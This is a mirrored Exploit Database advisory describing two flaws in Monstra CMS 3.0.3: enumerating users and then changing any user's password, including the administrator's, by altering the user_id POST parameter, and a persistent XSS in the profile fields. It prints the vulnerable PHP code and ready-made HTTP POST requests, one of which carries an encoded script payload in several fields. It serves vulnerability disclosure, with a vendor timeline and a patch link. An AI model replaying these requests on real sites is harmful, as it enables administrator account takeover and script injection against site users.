Monstra CMS 3.0.3 – Multiple Vulnerabilities

• Exploit Database
• 35 阅读

• 作者： Sarim Kiani
  日期： 2016-03-16
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/39567/

• Exploit Title: Monstra CMS 3.0.3 - Privilege Escalation / Remote Password Change
  Google Dork: intext:"Powered by Monstra"/users/registration
  Date: 2016-03-28
  Exploit Author: Sarim Kiani
  Vendor Homepage: http://monstra.org
  Software Link: http://monstra.org/download
  Version: 3.0.3
  Tested on: Windows OS
  
  ==================== TIMELINE ====================
  - Discovery Date: March 16 2016
  - Disclosed to Vendor: March 22 2016
  - Vendor Fixed the Issue: March 27 2016
  ==================================================
  
  Bug Tracking ID: Github Issue # 405
  Link: https://github.com/monstra-cms/monstra/issues/405
  
  Application Description: Monstra is a modern light weighted Content Management System written in php.
  
  1. Vulnerability Description:
  
  Any user can change credentials of other users including the Administrator credentials. This can allow the attacker to gain Administrator access and completely compromise the application.
  
  Once logged in as a regular user or successfully registering as a new user, use the following URL to gain information (username) of other users:
  http://localhost/monstra-3.0.3/users/1
  
  The digit '1' is of Admin or first user created in the database. By changing the digit, all registered usernames can be found.
  
  Then by using the 'Edit Profile' option of own user account, password of any other user including the Administrator can be changed by changing the POST parameters 'user_id', 'login' and 'new_password'.
  
  
  2. Proof of Concept/Code Flaw:
  
  `In file monstra\plugins\box\users\users.plugin.php
  
  Function: getProfileEdit
  
  Line No: 233
  
  if (Users::$users->update(Request::post('user_id'),
  array('login' => Security::safeName(Request::post('login')),
  'firstname' => Request::post('firstname'),
  'lastname'=> Request::post('lastname'),
  'email' => Request::post('email'),
  'skype' => Request::post('skype'),
  'about_me'=> Request::post('about_me'),
  'twitter' => Request::post('twitter')))) {
  
  // Change password
  if (trim(Request::post('new_password')) != '') {
  Users::$users->update(Request::post('user_id'), array('password' => Security::encryptPassword(trim(Request::post('new_password')))));
  }
  
  Notification::set('success', __('Your changes have been saved.', 'users'));
  Request::redirect(Site::url().'/users/'.$user['id']);
  
  On editing profile user id is taken from Request::post('user_id'). An attacker can provide any user id on change password funcionality
  
  Users::$users->update --> updates the password`
  
  Header:
  
  > POST /monstra-3.0.3/users/8/edit HTTP/1.1
  Host: localhost
  Content-Length: 152
  Cache-Control: max-age=0
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
  Origin: http://localhost
  Upgrade-Insecure-Requests: 1
  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36
  Content-Type: application/x-www-form-urlencoded
  Referer: http://localhost/monstra-3.0.3/users/8/edit
  Accept-Encoding: gzip, deflate
  Accept-Language: en-US,en;q=0.8
  Cookie: COOKIE_SUPPORT=true; GUEST_LANGUAGE_ID=en_US; has_js=1; PHPSESSID=abtuklkn1r0rjbub01527gjav0; _ga=GA1.1.592562515.1457951975; login_attempts=i%3A4%3B
  
  csrf=eb616fed8ca93d9de582a4f7d75ee3a3a0d6e3ec&user_id=8&login=user&firstname=&lastname=&email=&twitter=&skype=&about_me=&new_password=&edit_profile=Save
  
  3. Solution:
  
  Vendor has resolved the issue, use the patch 'User Security Fix # 406'.
  
  Link: https://github.com/monstra-cms/monstra/pull/406/commits/2e2a22ee5aafa28771f87c108edea024b618a8d5
  
  ##################################################################################
  
  #Exploit Title: Monstra CMS 3.0.3 - Persistent XSS 
  #Google Dork: intext:"Powered by Monstra"
  #Date: 2016-03-16
  #Exploit Author: Sarim Kiani
  #Vendor Homepage: http://monstra.org
  #Software Link: http://monstra.org/download
  #Version: 3.0.3
  #Tested on: Windows OS
  
  
  Monstra is a modern light weighted Content Management System written in php.
  
  
  1. Description
  
  A Persistent XSS exists in the "Edit Profile" page of the application.
  
  
  2. Proof of Concept
  
  Any user entering personal information in the "Edit Profile" page of the application can insert XSS Payload in the Form.
  
  Payload: "><script>alert(1);</script>
  
  The following entries on the page are vulnerable to a Persistent XSS payload:
  
  'Firstname', 'Lastname', 'Email', 'Twitter', 'Skype' and 'About Me'.
  
  POST /monstra-3.0.3/users/8/edit HTTP/1.1
  Host: localhost
  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  Accept-Language: en-US,en;q=0.5
  Accept-Encoding: gzip, deflate
  Referer: http://localhost/monstra-3.0.3/users/8/edit
  Cookie: GUEST_LANGUAGE_ID=en_US; COOKIE_SUPPORT=true; SCREEN_NAME=5374564c7570434448716b3d; SESS7a361a010634612fb69871c3ab2715f1=05e_dlYEnDv4-n3tC89gHEXGp3l-L5CXZY7LNgxFIFg; docebo_session=an9dgdq6rmlg3bv5b29tj45653; PHPSESSID=no30picpa0c5khn86lmcd53cb5; _ga=GA1.1.739562915.1457952544
  Connection: keep-alive
  Content-Type: application/x-www-form-urlencoded
  Content-Length: 440
  
  csrf=685bba70d144b8b8727937b56f5b87e669135fe1&user_id=8&login=user&firstname=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&lastname=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&email=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&twitter=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&skype=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&about_me=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&new_password=&edit_profile=Save
  
  
  3.Solution
  
  No newer (fixed) versions are currently available.